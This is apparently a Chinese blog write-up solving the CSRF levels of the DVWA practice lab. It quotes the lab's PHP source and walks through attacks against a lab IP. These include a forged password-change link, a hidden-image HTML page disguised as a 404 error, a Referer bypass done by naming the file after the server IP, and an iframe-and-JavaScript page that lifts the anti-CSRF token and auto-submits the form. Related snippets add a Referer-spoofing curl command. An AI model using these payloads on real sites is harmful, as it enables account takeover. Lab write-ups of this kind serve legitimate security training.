DVWA之CSRF通关解析

最新推荐文章于 2025-06-23 16:25:14 发布
原创 最新推荐文章于 2025-06-23 16:25:14 发布 · 436 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#csrf #安全 #前端

文章介绍了CSRF攻击的概念,通过伪造用户的浏览器请求,欺骗网站执行恶意操作,如更改密码。Low级别防护薄弱,只需两次输入相同密码即可更改。Medium级别增加了HTTP_REFERER检查,但通过设置相同域名的恶意页面仍可绕过。High级别采用POST请求和Token验证,攻击者需获取Token才能进行有效攻击,安全性显著提高。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CSRF(Cross-site request forgery),也被称为:one click attack/session riding,中文名称:跨站请求伪造,缩写为:CSRF/XSRF。

一般来说,攻击者通过伪造用户的浏览器的请求,向访问一个用户自己曾经认证访问过的网站发送出去,使目标网站接收并误以为是用户的真实操作而去执行命令。常用于盗取账号、转账、发送虚假消息等。攻击者利用网站对请求的验证漏洞而实现这样的攻击行为,网站能够确认请求来源于用户的浏览器,却不能验证请求是否源于用户的真实意愿下的操作行为。

简而言之,就是在用户cookie没过期时候诱导用户点击恶意链接,这些链接会携带恶意操作,如更改密码等,例如当用户A在登陆微博时候,在为下线状态下点了恶意链接,黑客会根据制作网页来利用A的cookie实现一系列操作。

LOW

查看源码

 <?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

low级没有任何防护措施,只要两次输入的密码相同就可以更改密码,我们将密码改为password点击确定会有以下界面在这里插入图片描述
此时的url就是一个实现更改密码操作的链接,也就是http://10.0.120.97/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

我们可以对其进行一下更改,将密码和确认密码改为123,也就是http://10.0.120.97/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#,在新打开一个网页,访问此链接在这里插入图片描述
此时在我们原本的页面中,发现password已经登不上了,
密码变为了123在这里插入图片描述
这就是因为我们先前的靶场cookie还未过期,打开后面的链接相当于我们访问了一个恶意网站,结果密码在不知不觉情况下被改为123,但是,类似http://10.0.120.97/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#这样的链接别人一看就知道是更改密码的链接,所以很多黑客会做进一步加工,制作一个html网页,用记事本写如下代码,再将记事本后缀名改为html

<html>
<head>
</head>
<meta charset='utf8'>
<body>
<img src="http://10.0.120.97/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#" border="0" style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

我们将该文件放到PHP的默认路径下:在这里插入图片描述

此时我们的服务器就是我们自己的电脑,所以只要访问http://127.0.0.1/test.html,就会打开我们做的网页
只要打开该文件,就会不知不觉访问更改密码的网站,但用户访问的页面如下:在这里插入图片描述
此时密码也被改为了123

Medium级

查看源码

 <?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

简单介绍:
1)int eregi(string pattern, string string)——检查string中是否含有pattern(不区分大小写),如果有返回True,反之False。
2)stripos函数:返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。
3)KaTeX parse error: Expected 'EOF', got '#' at position 25: …HTTP_REFERER'] #̲链接到当前页面的前一页面的 U…_SERVER[‘SERVER_NAME’] #当前运行脚本所在服务器主机的名称。

I)host头是指定要请求的资源的IP(或者域名)+端口号。没有端口号则是默认的。
II)referer头是告诉服务器从哪里来的,包括协议、域名、端口、路径和参数。
所以这里验证的是前一页的地址中有没有要访问的域名,所以需要把访问的文件
名字改成是host的name(IP(或者域名))。
III)也就是refer中必须包含主机名(host),即把前面的攻击页面命名为 IP地址.html(页面被放置在攻击者的服务器中)

总而言之就是该页面会检测你访问页面的来源,方式就是看你的url中是否包含源服务器地址,我们知道服务器的IP,比如10.0.120.66,我们只需要将我们LOW级中的test.html改为10.0.120.66.html就行,访问界面如下:在这里插入图片描述
此时它的url中是包含源服务器地址的,故能正常访问

high级

其源码为

<?php

$change = false;
$request_type = "html";
$return_message = "Request Failed";

if ($_SERVER['REQUEST_METHOD'] == "POST" && array_key_exists ("CONTENT_TYPE", $_SERVER) && $_SERVER['CONTENT_TYPE'] == "application/json") {
    $data = json_decode(file_get_contents('php://input'), true);
    $request_type = "json";
    if (array_key_exists("HTTP_USER_TOKEN", $_SERVER) &&
        array_key_exists("password_new", $data) &&
        array_key_exists("password_conf", $data) &&
        array_key_exists("Change", $data)) {
        $token = $_SERVER['HTTP_USER_TOKEN'];
        $pass_new = $data["password_new"];
        $pass_conf = $data["password_conf"];
        $change = true;
    }
} else {
    if (array_key_exists("user_token", $_REQUEST) &&
        array_key_exists("password_new", $_REQUEST) &&
        array_key_exists("password_conf", $_REQUEST) &&
        array_key_exists("Change", $_REQUEST)) {
        $token = $_REQUEST["user_token"];
        $pass_new = $_REQUEST["password_new"];
        $pass_conf = $_REQUEST["password_conf"];
        $change = true;
    }
}

if ($change) {
    // Check Anti-CSRF token
    checkToken( $token, $_SESSION[ 'session_token' ], 'index.php' );

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = mysqli_real_escape_string ($GLOBALS["___mysqli_ston"], $pass_new);
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '" . $pass_new . "' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert );

        // Feedback for the user
        $return_message = "Password Changed.";
    }
    else {
        // Issue with passwords matching
        $return_message = "Passwords did not match.";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);

    if ($request_type == "json") {
        generateSessionToken();
        header ("Content-Type: application/json");
        print json_encode (array("Message" =>$return_message));
        exit;
    } else {
        echo "<pre>" . $return_message . "</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

递交方式改为post(意味着我们从url中无法看到我们的操作),同时还加上了token值,Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。
试着去构造一个攻击页面,将其放置在攻击者的服务器,引诱受害者访问,从而完成CSRF攻击,下面是代码:
下面展示一些 内联代码片

<script type="text/javascript"> 
    function attack() {
 
   document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
   document.getElementById("transfer").submit();   }
</script>
<iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>
 
<body οnlοad="attack()">
 <form method="GET" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/csrf">
    <input type="hidden" name="password_new" value="password">
    <input type="hidden" name="password_conf" value="password">
    <input type="hidden" name="user_token" value="">
    <input type="hidden" name="Change" value="Change">
 </form>
</body>

可以直接通过用户的cookie来获取token,在进行之前的操作进行攻击

纳纳乌
关注
DVWA-CSRF
STTTM的博客
12-18 1139
LOW等级: 首先进行正常操作。 接下来打开burpsuit抓包 如图所示,将password参数test改为password: 退出DVWA用刚刚修改的密码成功登陆: 由此可知,这个数据包发送给其他用户,只要该用户登陆了DVWA的网站,就能修改他们的密码,攻击者只要修改password_new和password_conf这两个参数为自己想要的密码,将新的get请求的...
DVWA CSRF 通关教程
weixin_57485018的博客
10-27 482
CSRF 介绍 CSRF,全称Cross-site request forgery,即跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作。 可以这样理解CSRF:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚
DVWA通关CSRF
ZJLE的博客
08-06 368
DVWA通关CSRFLow:Medium:HighCSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 Low: 源码分析一下: <?php if( iss
DVWA靶场通关CSRF漏洞实验(初级)
最新发布
【安歌er】的博客
06-23 274
DVWA-CSRF漏洞实验(初级)
DVWA靶场之CSRF通关详解
qq_62169455的博客
06-27 4322
CSRF的形成原因主要是由于Web应用程序没有充分验证请求来源的问题。正常的请求必须携带正确的Cookie信息,而攻击者可以构造一个恶意网站,在其中包含一个发送CSRF请求的链接或表单,当用户访问这个网站时,浏览器会自动发送CSRF请求到被攻击的网站,从而实现攻击。这里查看源码,与刚刚的low等级比较发现,这里只有一个等级发生了改变,即在传入密码和确认密码参数前先进行了一个if语句的判断,判断里面的内容主要是验证这个访问请求是否从dvwa网站本身发起的,如果不是这个网站发起的请求,后面的操作就不执行。
DVWACSRF
RexHa的博客
09-30 8915
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA靶场通关----(三)CSRF
m0_74977101的博客
02-04 898
攻击者诱骗用户浏览器向目标网站发送一个“伪造的请求”(如转账、修改密码),利用用户已登录的会话权限完成恶意操作。
DVWA靶场CSRF漏洞通关教程及源码审计
m0_74786138的博客
01-13 759
通过POST请求传送JSON格式的数据,也支持传统的表单提交。代码首先检查请求是否合法,并提取用户令牌、新密码和确认密码。然后验证密码是否匹配,如果匹配,则对新密码进行安全处理(转义和加密),并更新数据库中的数据。这一关多了token,只要保证与浏览器的token对上即可。没有任何过滤措施,很危险,并且采用了不安全的。第4行设置了请求来源防止跨站伪造请求。打开burp缺少referer头。设置了多种验证,是很安全的方式。复制在另一个网页打开。
DVWA全级别通关教程
热门推荐
weixin_52515588的博客
03-26 10万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
DVWA通关详解初级
weixin_44831109的博客
03-16 4268
一、Brute Force(暴力破解)漏洞 (级别:low): 1.查看代码 可以看到,服务器只是验证了参数Login是否被设置,没有任何的防爆破机制 2.使用burpsuit抓包 3.单击Action发送到Intruder进行密码爆破 4.先清除 ,然后选中要爆破字段,点击添加 5.设置Payloads 6.点击右上角开始攻击 7.成功爆破 测试过程(级别:medium): 1.查看代码 从源码可以看到,与初级相比多出了红框框的内容,就是对一些特殊字符进行了转义还是与初级一样进行爆破
网络安全DVWA通关教程:Web漏洞学习与实践
05-24
文档首先概述了DVWA的功能及其涵盖的十种常见Web攻击模块,包括暴力破解、命令注入、跨站请求伪造(CSRF)、文件包含、文件上传、不安全验证码、弱会话ID、SQL注入(含盲注)、跨站脚本攻击(XSS)及内容安全策略绕...
dvwa csrf
gwl7878的博客
06-27 691
中级 curl -e "http://172.19.180.27/dvwa/vulnerabilities/csrf"  --Cookie "security=medium; PHPSESSID=8sfh17npgpajd0ikuh3"  --location "http://172.19.180.27/dvwa/vulnerabilities/csrf/?password_new=pass
DVWA CSRF
m0_73606240的博客
01-13 285
DVWA CSRF
dvwa-csrf
Alter__的博客
04-23 453
(元素可提供有关页面的元信息,比如针对搜索引擎和更新频度的描述和关键词) (关联css文件) (role充当什么角色nav?)
DVWACSRF 通关详解
2301_79218873的博客
04-15 976
csrf的防范手段:referer、token、cookie、seesion、二次验证。正因为为了方便而带来了危险。CSRF-impossible中源码是一种安全手段。​"" : ""));​' );?
DVWA-csrf
Darklord.W
04-09 241
低 构造修改密码的链接: 写一个修改密码的脚本文件,访问该页面就可以修改密码: 复制到kali中并开启apache服务 重置数据库密码,并用其他虚拟机访问kali脚本 此时便可以用修改后的密码登录dvwa 构造攻击页面需要事先在公网上传一个攻击页面,诱骗受害者去访问,真正能够在受害者不知情的情况下完成CSRF攻击 中 以通过抓包将主机名放在h...
dvwa靶场csrf通关
09-05
在进行DVWA靶场的CSRF通关时,通常需要利用一个带有恶意代码的链接,来欺骗用户点击该链接,从而触发CSRF攻击。引用和引用提供了两个链接,其中包含了类似以下格式的参数:password_new=123456&password_conf=123456&Change=Change&user_token=xxxxxxxxxxxxxx。其中,user_token是一个用于防止CSRF攻击的令牌。 为了成功完成CSRF通关,你可以使用这些链接中的其中一个,将其发送给目标用户,以诱使该用户点击链接。当用户点击链接时,恶意代码就会利用用户的登录凭证进行操作,例如更改密码。这样,你就能成功完成DVWA靶场的CSRF通关。 需要注意的是,为了成功进行CSRF攻击,你需要确保目标用户已经登录了DVWA靶场,并且用户的浏览器没有启用CSRF防护机制(如SameSite属性或CSRF令牌验证)。同时,也要注意遵循法律和道德规范,不要进行未经授权的攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA靶场之CSRF通关详解](https://blog.youkuaiyun.com/qq_62169455/article/details/131427023)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [kali2021.3安装dvwa靶场](https://download.youkuaiyun.com/download/u014419722/82144505)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值